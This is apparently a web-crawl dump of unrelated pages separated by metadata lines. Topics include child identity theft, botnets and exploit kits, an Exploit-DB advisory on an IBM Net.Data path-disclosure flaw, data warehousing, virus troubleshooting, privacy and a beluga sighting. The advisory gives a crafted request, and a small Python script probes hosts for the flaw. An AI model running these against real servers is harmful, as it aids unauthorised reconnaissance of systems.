The epidemic of child identity theft revealed last year is continuing to grow. 10.7% of the nearly 27,000 children in the study are victims of identity theft, a rate 35 times higher than that of adults in the same population, according to AllClear ID. The new data also showed that identity theft is increasing most quickly among young children. In fact, identity theft among children ages 5 and under grew 105% since last year – the highest growth rate of any age group – while 26% of children targeted were between the ages of six and ten, a 34% increase.

Young children are optimal targets for criminals because they have yet to apply for anything that would establish a credit history, so their identities are clean slates and thieves can use their information without being detected for many years. Thieves can easily attach a different name to a child's Social Security number and use it to buy houses and cars, take out credit cards, and open lines of credit. When the child, as a young adult, attempts to use his or her Social Security number for the first time to get a loan or job, the thief's bogus information and negative credit history will show up and cause serious problems.

Based on extensive scans covering nearly 27,000 children, the report, titled Child Identity Theft 2012, is a quantitative analysis of the results. There are no survey results included, as this report reflects the actual theft that children and their families have experienced. The report includes a detailed analysis along with stories of real victims and the serious financial and emotional impact child identity theft has had on their families. Key takeaways from the report include:

- Criminals are targeting the youngest children. 15% of victims were five years old and younger, an increase of 105% over the 2011 findings.
- 26% of victims were six to ten years old, a growth of 34% from the 2011 report. This stands in sharp contrast to the rates for children over eleven, which remained flat or decreased.
- 10.7% (2,875) of the minors included in the report had someone else using their Social Security numbers. This is an increase of 0.5 percentage points from the 10.2% rate reported in the 2011 report.
- The rate of identity theft for children was 35 times higher than the rate for adults in the same population.
- $1.5 million was the largest fraud committed. This was against a 19-year-old girl whose Social Security number had been used since she was nine years old.
- The overall number of suspects fraudulently using Social Security numbers per child increased by 15% this year over the previous year's report. One child had six suspects using her Social Security number.

"It's important for parents to understand that child ID theft is a real and growing trend," said Bo Holland, CEO of AllClear ID. "Rather than letting this trend continue, consumers – parents especially – should take the necessary precautions to ensure the safety of their child's livelihood. We have the technology, at AllClear ID, to help parents do just that."

There are steps that parents can take to ensure their child's information is not being used fraudulently, including:

- Use free solutions designed specifically to detect child identity theft.
- Guard their Social Security number.
- Start scanning your child's Social Security number when they are young.
- Go beyond the credit report. Our data showed that 41% of the fraudulent activity was occurring at sources other than the credit bureaus.
- Talk to your child about online privacy and information security.
- Use social media with caution.
Mary is a new security administrator. She wants to focus most of her efforts on the areas that have the greatest risk. Which of the following areas poses the greatest risk?

A. Employees
B. Hackers
C. Cyber terrorism
D. Viruses

Answer option A is correct. Employees pose the greatest risk; even malware is often introduced to a network through lack of diligence on the part of employees. Answer option B is incorrect: while hackers are a real problem, they pose less risk than internal employees. Answer option D is incorrect: viruses are a legitimate concern, but they are often introduced because employees fail to follow security policies. Answer option C is incorrect: cyber terrorism is a real threat, but it is less of a threat than employees.
The Botnet Ecosystem: Compromised Servers

Botnets propagate in all manner of ways. Servers compromised by way of insecure applications or poor security practices provide one way malicious people can push client-compromising exploits.

Command and Control

Regardless of the fact that P2P technologies are starting to be used for communication between bots, it is still useful to understand how the less evolved bots function. The new P2P-enabled bots have the same functionality at their core, so the concept is the same. A bot herder who controls a bot server (or multiple servers) has at his disposal a number of interesting tools. We briefly talked about what botnets are used for in the introduction to this series, but now let's take a more detailed look at the actual commands a server can send to bot clients.

- Start flooding a specific IP or network using TCP, UDP, or ICMP
- Add/delete Windows services from the registry
- Test the Internet connection speed of the infected computer
- Start the following services: http proxy, TCP port redirector, and various socks proxies
- Run their own IRC server, becoming a master for other bots to connect to
- Capture or "harvest": CD Keys from the Windows registry, AOL traffic including passwords, and the entire Windows registry itself
- Scan and infect other computers on the local network
- Send spam
- Download and execute a file from a given FTP site

Moreover, if that was not horrific enough for you, consider the following: all of the IRC bots have modular capabilities. Therefore, if someone programs a new module to extend the bots' capabilities, the owner of the botnet simply runs a single command to install and use the new module on every bot.

Web Exploitation Kits

These kits allow the attacker to gain control of a client machine when it visits a malicious Web page. The most common avenue of attack is via browser vulnerabilities. The attacking code will instruct the Web browser to download and execute malicious code without the user even knowing. It isn't always a matter of "stupid user that clicked yes," which is why it is so important to install patches as soon as they are released.

It is extremely rare for attack code to be part of the initial exploit. Instead, it generally instructs the victim browser to download the exploit from another server. A malicious Web page doesn't generally host the exploit, probably because it'd be reported even more quickly. The server hosting the actual exploit is generally a Web server that was running some piece of PHP (or other) code that allowed someone to secretly upload whatever they wanted. This is caused by mistakes in server configuration, Web application programming errors, or sometimes just plain old security holes in the underlying technologies used. Of course, attackers need to be able to keep track of which IPs they have compromised.

MPack and IcePack are the two most popular kits available. They both provide the user with a Web interface and configuration options to set up a "downloader." The downloader is the program that gets run on exploited machines after an attack has succeeded. The downloader will fetch and execute malware from wherever it's configured to do so, and it can use encryption to avoid network-based detection. These Web kits provide attackers with a neat Web page to view statistics about their attack progress. It provides information about how successful the attack is, as well as lists of already-compromised IP addresses.
This excellent honeynet.org paper describes the process in more detail, but suffice it to say, this is extremely trivial stuff. Anyone who gets a hold of IcePack, for example, can quickly begin compromising their Web site visitors' computers. No skill, and no knowledge of the actual exploits, is required.

Compromised Web servers, regardless of color or race, pose a great threat to overall Internet safety. Vulnerable applications exist on every type of Web server, and the underlying OS does nothing to prevent simple exploits from taking place. Simple exploits, like inserting a little text into a site, used to be pretty innocent. Script kiddies, as they were called, would run other peoples' exploits and deface sites with obscene text or their groups' markings. Every once in a while they would try running some code to open a backdoor into a Unix server, which allowed them access as the user the Web server ran as. But now, with botnets and automated attacks, a simple exploit like this is pretty serious.

Web servers play a huge role in the initial infection, re-infection, and maintenance of botnets. Very often the "downloader" provided by the Web exploitation kits will be used to install bot client software. This is likely an extremely effective method of expanding a botnet, since network-based attacks can be blocked and are more likely to be patched. Fixing all Web server holes won't stop users from getting infected by any means, but understanding the role of exploited Web servers in the malware ecosystem helps us learn how to fight it.
Sirami C. (CNRS Center of Evolutionary and Functional Ecology; South African National Biodiversity Institute; University of Cape Town), Nespoulous A. (CNRS Center of Evolutionary and Functional Ecology), and 9 more authors. Landscape and Urban Planning, 2010.

Mediterranean landscapes resulted from the complex and ancient interaction of ecosystems and societies. Today they represent one of the world's biodiversity hotspots. These landscapes have a fine-grained mosaic and a high resilience to disturbances. However, during the last century, human pressures have led to new landscape structures and dynamics and an overall decrease in biological diversity. Within a Mediterranean landscape from southern France, we assessed the effects of land use changes on land cover and biodiversity over the last 60 years. The major land use changes involved a substantial decrease in sheep grazing and wood cutting corresponding to the abandonment of 70% of the study area. This resulted in a reduction in land use diversity which was usually high in the Mediterranean. Although land cover in the study area changed gradually (2.2% per year), over 74% changed between 1946 and 2002. This habitat shift had a subsequent impact on species distribution. Apart from amphibians and insects, most species of birds, reptiles, orchids and rare plants that responded positively to these changes were associated with woodlands, while species that responded negatively were associated with open habitats. In the Mediterranean, most rare and endemic species are associated with open habitats and are thus threatened by land abandonment. As a result, land abandonment is contributing to a decrease in local species richness and a decrease in rare and endemic species. Since similar patterns of change have been observed over most of the north-western Mediterranean, land abandonment represents a major threat for biodiversity in the Mediterranean. © 2010.

Bolte S. (Center de; University Pierre and Marie Curie), Lanquar V. (French National Center for Scientific Research; Carnegie Institution for Science), and 6 more authors. Plant and Cell Physiology, 2011.

Plant cell vacuoles are diverse and dynamic structures. In particular, during seed germination, the protein storage vacuoles are rapidly replaced by a central lytic vacuole enabling rapid elongation of embryo cells. In this study, we investigate the dynamic remodeling of vacuolar compartments during Arabidopsis seed germination using immunocytochemistry with antibodies against tonoplast intrinsic protein (TIP) isoforms as well as proteins involved in nutrient mobilization and vacuolar acidification. Our results confirm the existence of a lytic compartment embedded in the protein storage vacuole of dry seeds, decorated by γ-TIP, the vacuolar proton pumping pyrophosphatase (V-PPase) and the metal transporter NRAMP4. They further indicate that this compartment disappears after stratification. It is then replaced by a newly formed lytic compartment, labeled by γ-TIP and V-PPase but not AtNRAMP4, which occupies a larger volume as germination progresses. Altogether, our results indicate the successive occurrence of two different lytic compartments in the protein storage vacuoles of germinating Arabidopsis cells. We propose that the first one corresponds to globoids specialized in mineral storage and the second one is at the origin of the central lytic vacuole in these cells. © 2011 The Author.

Deconinck N. (Free University of Colombia; University Pierre and Marie Curie), Dion E. (University Paris Diderot), Yaou R.B. (University Pierre and Marie Curie), and 24 more authors. Neuromuscular Disorders, 2010.

Bethlem myopathy and Ullrich congenital muscular dystrophy are part of the heterogeneous group of collagen VI-related muscle disorders. They are caused by mutations in collagen VI (ColVI) genes (COL6A1, COL6A2, and COL6A3) while LMNA mutations cause autosomal dominant Emery-Dreifuss muscular dystrophy. A muscular dystrophy pattern and contractures are found in all three conditions, making differential diagnosis difficult especially in young patients when cardiomyopathy is absent. We retrospectively assessed upper and lower limb muscle CT scans in 14 Bethlem/Ullrich patients and 13 Emery-Dreifuss patients with identified mutations. CT was able to differentiate Emery-Dreifuss muscular dystrophy from ColVI-related myopathies in selected thigh muscles and to a lesser extent calves muscles: rectus femoris fatty infiltration was selectively present in Bethlem/Ullrich patients while posterior thigh muscles infiltration was more prominently found in Emery-Dreifuss patients. A more severe fatty infiltration particularly in the leg posterior compartment was found in the Emery-Dreifuss group. © 2010 Elsevier B.V.
<urn:uuid:1f1288e6-aba7-42ad-933b-5b84dfc0e6bc>
CC-MAIN-2017-04
https://www.linknovate.com/affiliation/center-de-484248/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284352.26/warc/CC-MAIN-20170116095124-00514-ip-10-171-10-70.ec2.internal.warc.gz
en
0.902792
1,037
3.03125
3
source: http://www.securityfocus.com/bid/2017/info
IBM Net.Data is a scripting language used to create web applications; it supports a wide range of language environments and is compatible with most recognized databases. Net.Data contains a vulnerability that reveals server information. Requesting a specially crafted URL through the CGI application, composed of an invalid request against a known database, will reveal the physical path of server files. Successful exploitation of this vulnerability could assist in further attacks against the victim host.
Example request: http://target/cgi-bin/db2www/library/document.d2w/show
Example response: DTWP029E: Net.Data is unable to locate the HTML block SHOW in file /projects/www/netdata/macro/software/library/document.d2w.
Related exploits: matched CVEs (1): CVE-2000-1110; matched OSVDBs (1): 9483. Other possible E-DB search terms: IBM Net.Data 7.0, IBM Net.Data.
Related entry: 2004-01-26 | IBM Net.Data 7.0/7.2 - db2www Error Message Cross-Site Scripting | Carsten Eiram
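A minimal sketch of checking for this behaviour, written after the fact and not part of the original advisory. Only the URL path and the DTWP029E marker string come from the text above; the host name and everything else are illustrative.

# Probe a host for the verbose Net.Data error described above (Python).
# Hypothetical target; only the path and the DTWP029E string come from
# the advisory text.
import urllib.request

def probe(base_url):
    url = base_url.rstrip("/") + "/cgi-bin/db2www/library/document.d2w/show"
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            body = resp.read().decode("utf-8", errors="replace")
    except Exception as exc:  # connection errors, HTTP errors, timeouts
        print("request failed:", exc)
        return
    if "DTWP029E" in body:
        print("verbose Net.Data error returned - path disclosure likely")
    else:
        print("no DTWP029E error string seen")

probe("http://target.example")  # hypothetical host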
<urn:uuid:3028438c-5ef2-4439-a109-29ec0d537bf4>
CC-MAIN-2017-04
https://www.exploit-db.com/exploits/20441/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280308.24/warc/CC-MAIN-20170116095120-00084-ip-10-171-10-70.ec2.internal.warc.gz
en
0.792435
257
2.640625
3
Accelerating the Data Warehouse
By David F. Carr | Posted 2002-11-01
Need quicker access to your data? Try Massively Parallel Processing (MPP), which breaks up a query so that multiple processors can run it against multiple storage devices.
- How is it done? In a number of ways. One of the more promising strategies, Massively Parallel Processing (MPP), involves breaking up a query so that multiple processors can run it against multiple storage devices, then reassembling the responses to produce an answer. Another alternative is SMP (Symmetric Multiprocessing), in which multiple processors juggle tasks using caching techniques and a common pool of memory.
- What's the benefit? Quicker access to information in a world of huge databases. With MPP, adding processors improves access time at a nearly linear rate: A 32-processor machine can query more than 3 terabytes of data in about the same time that a single processor could query 100 gigabytes. While the scalability and performance of SMP systems keep improving, MPP architectures still dominate very large data warehousing applications.
- Who invented it? In the data warehousing market, NCR's Teradata unit has been MPP's biggest proponent. The largest Teradata warehouses run on the company's own WorldMark server hardware and its own version of Unix, using a database management system designed specifically for the MPP environment. Because supporting MPP requires tweaks to the database management system, operating system and server hardware, many vendors have preferred to push the limits of what they can achieve with SMP. However, IBM is supporting MPP with its Regatta servers (RS/6000 SP) and in its DB2 Extended Enterprise Edition. In September, startup Netezza introduced its Netezza Performance Server, a refrigerator-sized "data warehouse appliance" aimed at providing MPP performance at a lower price by using open-source software like Linux and the Postgres database. Netezza uses specialized query-processing chips installed on each hard disk. Each of these "snippet processors" scans the disk it is responsible for, finds data matching the query parameters, and sends the results back to the database responsible for assembling the answer. This cuts down on the transmission of irrelevant data within the server cabinet, minimizing performance bottlenecks and lessening the workload on the central database.
- Who's using it? Teradata has a blue-chip customer base, including Wal-Mart in retailing and Whirlpool in manufacturing. Lloyd's of London is using IBM's MPP solution to analyze claims and other insurance data. Netezza has captured a handful of early customers. Vibrant Solutions, which works with companies such as Nextel on call-data analysis, says it will be able to support much more data, with faster query response, by employing Netezza's technology. "It's very similar to a lot of the other massively parallel architectures that have been around for a while, but they brought the price into a reasonable window," says Vibrant CTO Rick Mahuson.
- What are the drawbacks? MPP systems tend to cost more, both in purchase price and in ongoing administration. Teradata says the long-term cost of ownership is favorable, however, particularly when scattered data marts (departmental data warehouses) are consolidated into a central, company-wide data warehouse.
Netezza is trying to change the price equation (at $2.5 million, even its 18-terabyte server is a fraction of the cost of comparable MPP systems) and claims its appliance will run with minimal administration. "Netezza's product shows great promise," says Giga Information Group analyst Philip Russom, but he suspects many enterprise customers will be scared of entrusting multi-terabyte applications to open-source technology.
REFERENCE: ONE QUERY, MANY PATHS
Even with today's superfast machines, it can take days to generate a report from a multi-terabyte warehouse. Here's how using Massively Parallel Processing can speed up the task.
- 1. A 3-terabyte data warehouse receives a request for a list of all customer purchases that were greater than $10,000.
- 2. It passes on the query to 10 "nodes." Each node has its own processors and also controls one or more storage devices. Each storage device, in turn, contains a subset of the 3-terabyte warehouse. In this example, each node queries one storage device that holds 100,000 records.
- 3. Each device sends back a list. The data warehouse consolidates the responses into a single result that takes hours instead of days to build.
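A toy sketch of that scatter-gather flow, with synthetic data standing in for the warehouse. The ten-node layout mirrors the example above, the record counts are scaled down, and a real MPP engine does all of this internally:

# Scaled-down scatter-gather sketch of the MPP flow described above.
from concurrent.futures import ThreadPoolExecutor

NODES = 10
ROWS_PER_NODE = 10_000   # scaled down from the 100,000 in the example
THRESHOLD = 10_000       # dollars

# Each "node" owns one partition of synthetic purchase records.
partitions = [
    [("cust-%d-%d" % (node, i), (node * 7919 + i * 104729) % 20_000)
     for i in range(ROWS_PER_NODE)]
    for node in range(NODES)
]

def scan_partition(rows):
    # Each node scans only its own slice of the warehouse.
    return [r for r in rows if r[1] > THRESHOLD]

# Scatter the query to all nodes in parallel...
with ThreadPoolExecutor(max_workers=NODES) as pool:
    partial_results = list(pool.map(scan_partition, partitions))

# ...then gather: the coordinator consolidates the per-node answers.
result = [row for part in partial_results for row in part]
print("%d purchases over $%d" % (len(result), THRESHOLD))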
<urn:uuid:afabe060-aab6-4c14-abe4-efd03619bb68>
CC-MAIN-2017-04
http://www.baselinemag.com/c/a/Projects-Networks-and-Storage/Accelerating-the-Data-Warehouse
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280730.27/warc/CC-MAIN-20170116095120-00570-ip-10-171-10-70.ec2.internal.warc.gz
en
0.909241
1,031
2.578125
3
One of the most common posts that you see in various forums is from people who suspect that their computer might be virus infected. Posts such as, “My computer is crashing, do I have a virus?” or “I just got infected with a virus, what should I do?” are a clear indication that virus infection is a serious problem and that having guidelines on how to tackle such an event is essential.
Determining whether you’re infected
The first step to take when suspecting your computer might be infected is to actually confirm whether it is or not. There are a lot of viruses out there and whilst most anti-virus solutions can detect almost all of them, there is always the risk of being infected with a custom virus – something as yet unknown or even something that your anti-virus solution might not be able to recognize yet. As such, if your anti-virus solution is saying that you’re clean, it’s a good sign, but not necessarily a definite one. What should one do to be sure?
The first step is to take note of when the symptoms that are making you suspect a virus started. Then think about anything that you might have run or installed during that time. (Note: not all infections start with the user running something, but it is the majority of cases. This should also include attachments you opened or ran from your received emails.) If anything from the above exercise raises a red flag in your mind, or might be of dubious origin (such as receiving an email from a friend that didn’t sound like them), then it is definitely worth investigating that file. We already know that the installed virus scanner didn’t detect any viruses but we need to be sure – so how about testing the file with multiple anti-virus engines?
Using multiple anti-virus engines
Don’t worry, you do not need to buy them all; there is a free service that does exactly this. All you need to do is upload the suspicious file and see if it is detected as malicious by any of the virus engines. If, on the other hand, you have no idea which file might have caused the infection, the only other option is to scan your computer with another anti-virus. Again, we do not have to buy any products for now; most anti-virus vendors offer free scanning from the web. These will only detect a virus, however; they will not clean it. Still, for our purpose, which is finding out whether we’re infected and with what, it’s enough. You can search the web for reputable online virus scanners.
Once you’ve finished scanning, if you do find a virus, you have three options:
- Buy the full product of the brand that detected your virus. (This will ensure that at least you will definitely know that it will be detected.)
- Search the web for a free tool that can clean this particular virus, or even documentation of how to do it manually. (This is only recommended if you’re an advanced user. Be aware that most of these procedures can be quite advanced and that either not following them correctly or discovering that they have an error in their procedure can make matters worse by breaking your Windows installation.)
- Alternatively, if you have backups you can also reinstall your Windows installation. This is a bit inconvenient but it is also the only way to be 100% sure that you got rid of the virus. (Make sure your backups are not infected!)
What if I am unable to find any virus?
If, after scanning with multiple anti-virus engines, you still don’t detect anything, it is likely that the symptoms you’re experiencing are coming from something else – possibly a hardware problem.
Of course, there is still that small chance that the virus is simply too new, or that it is custom built and this was a targeted attack. Anti-virus products do, however, use heuristics to detect infections; i.e. they look for suspicious routines in software that might indicate a virus even though that type of virus has never been analyzed before by the anti-virus vendor.
Let’s assume that there is actually no virus. In this case we must look at what the symptoms are and what’s causing them. What people most often mistake for a virus is the computer freezing. This can happen for a number of reasons, the most common being faulty RAM. We can test for this using the free program memtest86+.
Video card issues
If your screen gets garbled before it freezes, it’s likely to be either a video card problem or a power supply unit that is not supplying enough power to the video card. It could also be that the graphics card is overheating. Playing modern 3D games is the best way to stress the video card, so if this happens when you’re playing, and occurs in multiple games, then this is definitely something worth looking into. Some graphics cards include utilities to monitor the temperature and current of the card, which are definitely worth keeping an eye on to help diagnose the issue.
Hard Disk Failure
If both the above seem okay, then a third possibility is a hard disk failure. Your computer uses a set amount of hard disk space for swapping (to use as memory when physical memory fills up); if that data is corrupted it can cause the computer to freeze when it is accessed again. To diagnose this, just run a disk check:
– right click on the drive you want to check in Windows Explorer
– click Properties
– switch to the Tools tab
– click Check Now under Error-checking
– make sure the check box ‘Scan for and attempt recovery of bad sectors’ is enabled.
If indeed there are bad sectors, then make sure the swap partition is on another drive that has none. It is also very much recommended that you have a backup of the data on that drive and that you replace it as soon as possible, as it might get worse and eventually stop working. To change the location of the swap file you need to:
– right click on My Computer
– choose Properties
– go to advanced system settings
– click on the Advanced tab
– choose Settings under the Performance group box
– go to the Advanced tab
– click on Change under the Virtual Memory group box.
What to consider if your machine is infected
There are a number of things to do if you find that your machine is infected. If your computer is hooked to a network, isolate it as soon as possible to prevent the infection from spreading. This is done either by disconnecting the infected machine from the network or, if you need the internet to fix the issue, by disconnecting the other machines if that is feasible. (Note that when connected to the internet the infected machine might try to infect other machines, send spam or even launch attacks against certain sites – some infections (Trojan horses) can effectively give control of your computer to a malicious third party, so in any case the less time online the better.)
Some infections are really insidious and actually modify the operating system to hide from the anti-virus software. These types of infections, called rootkits, can be impossible to detect from the infected system itself. In this case we’d need to boot from a clean Windows installation and use that to run our scans.
Luckily there are products out there that offer bootable CDs to use in these cases. Advanced users can even build their own.
Prevention is better than Cure
Here are a few tips on how not to get infected and how to protect yourself from getting infected again.
- It is essential to keep your system up-to-date. Software has bugs, and bugs can sometimes be exploited by viruses to infect people’s machines without their intervention. So ensure that your system is up-to-date with the latest security patches. Microsoft, for example, generally releases its security patches on the second Tuesday of each month.
- Have an anti-virus solution in place to protect your machine. Businesses can go a step further and install products that protect specific vectors such as web downloads and email, using products that scan for multiple viruses using multiple anti-virus engines. Having a firewall set up can also reduce the risk of infection.
- Be careful of what you install and run on your machine. Each time you run an application there is a risk of infection; the more unreliable the source, the bigger the risk. No source is ever 100% safe, as viruses have sometimes been distributed with hardware and even with magazines, as reported in a recent story about the virus that targets the Delphi development environment: W32/InducA. This is not to say that one shouldn’t run any software, but it’s good practice to be aware and protected.
We have discussed at length how to confirm whether your machine has an infection or not, as well as what it could be if there are signs that point to an infection but no virus is found. We have also gone through some good tips on how one can protect their system from infection; however, this is a huge area and individual cases will be different, but if you have any difficulties or situations that haven’t been discussed here, feel free to leave a comment and I will try to help out if I can.
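P.S. If you would rather not upload a potentially sensitive file to a multi-engine scanning service, some services also let you look up a file by its cryptographic hash (whether a particular service supports this is worth checking). A minimal sketch of computing such a hash with Python’s standard library; the file name is illustrative:

# Compute the SHA-256 hash of a suspicious file without uploading it.
import hashlib

def sha256_of(path):
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        # Read in chunks so large files need not fit in memory.
        for chunk in iter(lambda: f.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()

print(sha256_of("suspicious_attachment.exe"))  # hypothetical file name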
<urn:uuid:44bb6d45-1011-457f-897f-6158a9fc4ddf>
CC-MAIN-2017-04
https://techtalk.gfi.com/pc-virus/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281353.56/warc/CC-MAIN-20170116095121-00386-ip-10-171-10-70.ec2.internal.warc.gz
en
0.954219
1,937
2.609375
3
TADOUSSAC, QUEBEC--(Marketwire - Oct. 10, 2012) - A three- or four-metre long white or greyish beluga whale has been seen several times near the Old Port since September 28. No photos have been taken yet, but the Québec Marine Mammals Emergency Network feels that these observations are reliable. Where did this beluga come from? The closest population of belugas lives in the St. Lawrence Estuary. It is a small population, isolated from other northern populations, and is considered threatened. The beluga in Montréal could be a young animal from this group that has gone exploring, which is normal behaviour. Why is it being monitored? Belugas are social animals. If this beluga were at home, it would be in constant contact with other belugas. Now that it is on its own, it may try to interact with boats and humans. In the summer of 2012, for example, we saw two young belugas travelling around the Gaspé Peninsula, interacting with boats and swimmers in every small town. Luckily, they returned to their natural habitat and those abnormal behaviours ceased. Other isolated belugas, spotted off the Lower North Shore and around Nova Scotia or Newfoundland, have been less lucky; they were eventually wounded or killed by a boat. Will it go back to where it came from? The best thing that could happen to this beluga is for it to swim back down the Saint Lawrence, find a group of belugas and return to its normal habitat. There is a good chance that this will occur. To help ensure its return, we must avoid it becoming used to humans and, therefore, we should not interact with it. How can you help? If you see the beluga, immediately call the Marine Mammals Emergency Network at 1-877-722-5346. It is important to stay at least 400 m away, not to approach it, not to lure it close to humans, not to make noise or stimulate or attract its attention, and not to try to feed it. It is also advisable to avoid boating in the area it has been seen. By limiting its interaction with humans, we can maximize the chance that it will return to its natural habitat in good health. The Quebec Marine Mammal Emergency Response Network is made up of a dozen private and governmental organizations. It has been mandated to organize, coordinate and implement measures to reduce the accidental death of marine mammals, help animals in trouble and gather information in cases of beached or drifting carcasses in waters bordering the province of Quebec.
<urn:uuid:10415c6d-871f-48bb-9fc3-928c6a0cbbd8>
CC-MAIN-2017-04
http://www.marketwired.com/press-release/beluga-sighting-in-montreal-1712010.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280310.48/warc/CC-MAIN-20170116095120-00506-ip-10-171-10-70.ec2.internal.warc.gz
en
0.962484
540
3.1875
3
Dr Louise Bennett explains the difference between security, secrecy, privacy and anonymity online.
At a roundtable hosted by Silent Circle, Dr Louise Bennett, chair of the Security Community of Expertise, talked about the issues in differentiating security, secrecy, privacy and anonymity online.
"The real balancing act between security and privacy is between notifications and the right to privacy," says Dr Bennett. "This is what people get upset about in companies like Google with the commercialisation of the internet and government surveillance. It's because these things have been linked together without the permission of the individual or they cross things that I don't give my consent to share with anybody else.
"We all know that there are a lot of different commercial models on the internet. Some services are free or below cost because of the value of data that you as a customer give up when you use the site. And the quid-pro-quo is usually targeted advertising. Young kids I talk to say, 'Facebook is free, and that's wonderful.' But Facebook is not free, get real! You're putting all this personal data out there and often they don't know the privacy settings so this can be seen by anybody and this is then used to target you.
"The key thing is how do you keep control of your data and personal information? Well statistics will tell you, you can't on the internet. Once it's out there, it's out there. If someone is determined to find your data, you've got a problem.
She stresses: "We have to understand that identity on the internet can be used as currency and can be gathered through Big Data aggregation and Big Data analytics, and you have to decide to what extent you are prepared to use your identity attributes as payment for services you want. But you have to be aware of it and make your own choice."
She also highlights the second balancing act, which puts security and secrecy on one side and privacy and anonymity on the other. "I think there are really significant differences between privacy and anonymity. I would say that on the internet, anonymity is the ability to perform actions without them being traced to a person; they can trace them to the thing, but not the person."
Dr Bennett draws out the pros and cons of anonymity by stating that it can ensure individuals have the right to free speech without fearing the repercussions. But also, people can't be easily identified and held to account if they are anonymous. Alternatively, she describes secrecy as what is known but not to everybody. Secrecy is what the intelligence services strive for. On the other hand, privacy is the ability to provide information only to those we want to provide it to, of our own free will.
"Privacy protects people and doesn't per se damage national security or law enforcement. But some would say it does. It does make those things harder to achieve. But I would say anonymity does cause damage," she says. "Some of the only people who have really chosen to be anonymous are the people in Anonymous and LulzSec. They knew the persona and the avatar, but they didn't know the biological person before they got together. Anonymity isn't necessarily for privacy but it is often misinterpreted as being synonymous with privacy. Activists in the Arab Spring say they wanted anonymity, but they didn't, because if they had anonymity they wouldn't have been known to their friends and could have been compromised by the state. What they wanted was privacy from the state. That is not the same thing.
"I think privacy overlaps security; they go hand-in-hand and what advocates for privacy really want is security for the individual from the intrusion into their personal life or targeted action. You have two groups of people: advocates of strong unique electronic identities for national security purposes will often come from countries like China and countries with oppressive regimes," explains Dr Bennett. On the side of those who are anti-anonymity, there are arguments that with the shield of anonymity, individuals can stalk, masquerade as others, they can be liable and will get into organisations to steal and defraud. Anonymous terrorists can plan, radicalise and perform cyber attacks and activists can compromise businesses and publish confidential information. Anonymity essentially removes accountability and makes the job of law enforcement much harder in the virtual world than it is in the physical world. For those who are pro-anonymity and oppose electronic identities argue that there are those who use anonymity with good intent: whistleblowers who unveil wrongdoings of powerful individuals or organisations. Individuals can partition their lives or limit damage caused by people stealing their identities. They’ll say that individuals with anonymity can avoid discrimination, escape abusive relationships and regimes and start a new life. Activists with a vested interest can give a voice to the silent majority. Anonymity protects the weak individual from abuse by the powerful. "Most people are probably on both sides of the argument: it isn’t as simple as that," says Dr Bennett. "There is an enormous amount of work being done across the world, security, privacy and anonymity: how they work against each other and how they overlap. There is never going to global agreement over the rationality of these different things, what we have to work towards is global understanding of people’s perspectives and an understanding of the context." She concludes: "There are those who are against anonymity because it prevents accountability of those with malicious intent and there are those who are for anonymity because there are those with good intent who are abused by others. There isn’t a single answer, you have to choose but you have to be aware of others opinions."
<urn:uuid:fec7c9a7-edfe-4a47-b61d-fe7d117e0a82>
CC-MAIN-2017-04
http://www.cbronline.com/news/do-you-want-to-be-private-or-anonymous-on-the-net
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280761.39/warc/CC-MAIN-20170116095120-00414-ip-10-171-10-70.ec2.internal.warc.gz
en
0.967848
1,182
2.84375
3
By Hariharan B, Research Analyst
Lead acid batteries are the preferred choice for powering automobiles due to certain advantages they carry and also because they are economically viable. Batteries that currently power automobiles are 12-volt (V) starting, lighting and ignition (SLI) batteries that are either of flooded construction or of valve regulated construction. Today's lead acid batteries have a limited power range, and with the demand for power increasing among automobiles, automotive vendors and battery manufacturers have been on the lookout for an efficient power device that provides the perfect solution in addition to being cost effective!
With the advent of hybrid electric vehicles and battery powered vehicles, the demand for batteries has been on the upswing. Also, the fact that batteries are environmentally friendlier than the petroleum products currently used to power automobiles makes them much more valuable as a product for use in transportation. The SLI batteries used today are typically 2V cells connected in series to provide 12V as a whole. The SLI battery comes into force when the automobile is being started, and this current given out by the battery is called the cranking current, which could vary from anywhere between 200 – 300 Amps up to 800 – 1000 Amps within a fraction of a few milliseconds. The batteries also come into play for powering certain other electrical and electronic equipment within the automobile.
The automotive segment is the biggest market for lead acid batteries, while the stationary and motive applications come a close second in terms of demand. The automotive segment offers enormous opportunities as the market is widespread across geographical regions, and with demand coming in from each and every automobile that's manufactured, the growth is likely to be positive with a demand that is likely to be sustained for years to come. The current battery demand in the automobile segment is being met by lead acid batteries mainly from the SLI segment, while deep cycle batteries cater to certain specific requirements, especially among the electric and hybrid vehicle category. The electrical power needs of a battery / hybrid powered vehicle are much greater than the power needs of typical petroleum fuel powered vehicles.
Future Power Needs
Hybrid electric vehicles (HEVs) combine the internal combustion (IC) engine of conventional vehicles with the energy storage device and electric motor of electric vehicles. Energy storage is normally provided by batteries, ultracapacitors or flywheels, with batteries by far the most preferred choice. Alternatively, in a pure battery powered vehicle, the entire power is generated by the batteries, and this in effect requires a larger amount of power as the output from the battery. On the other hand, gas powered vehicles are increasing their power needs due to increased dependence on electronics and automation. The 42V electrical system demands a 36V battery that can power the demands of the automobile. The challenge is to have a single 36V battery with only a slight increase in size and weight in comparison to the 12V battery, yet double or triple the electrical performance.
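To make the jump from 12V to 42V concrete, a rough back-of-the-envelope comparison; the load current is an assumed figure, purely for illustration:

# Illustrative arithmetic only (P = V * I): power deliverable at an
# assumed 100 A load on a 12 V bus versus a 42 V bus.
ASSUMED_CURRENT_A = 100  # hypothetical load current

for bus_voltage in (12, 42):
    power_kw = bus_voltage * ASSUMED_CURRENT_A / 1000.0
    print("%d V bus at %d A -> %.1f kW" % (bus_voltage, ASSUMED_CURRENT_A, power_kw))

# The 42 V bus delivers 3.5x the power at the same current - or the same
# power at roughly a third of the current, allowing thinner wiring.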
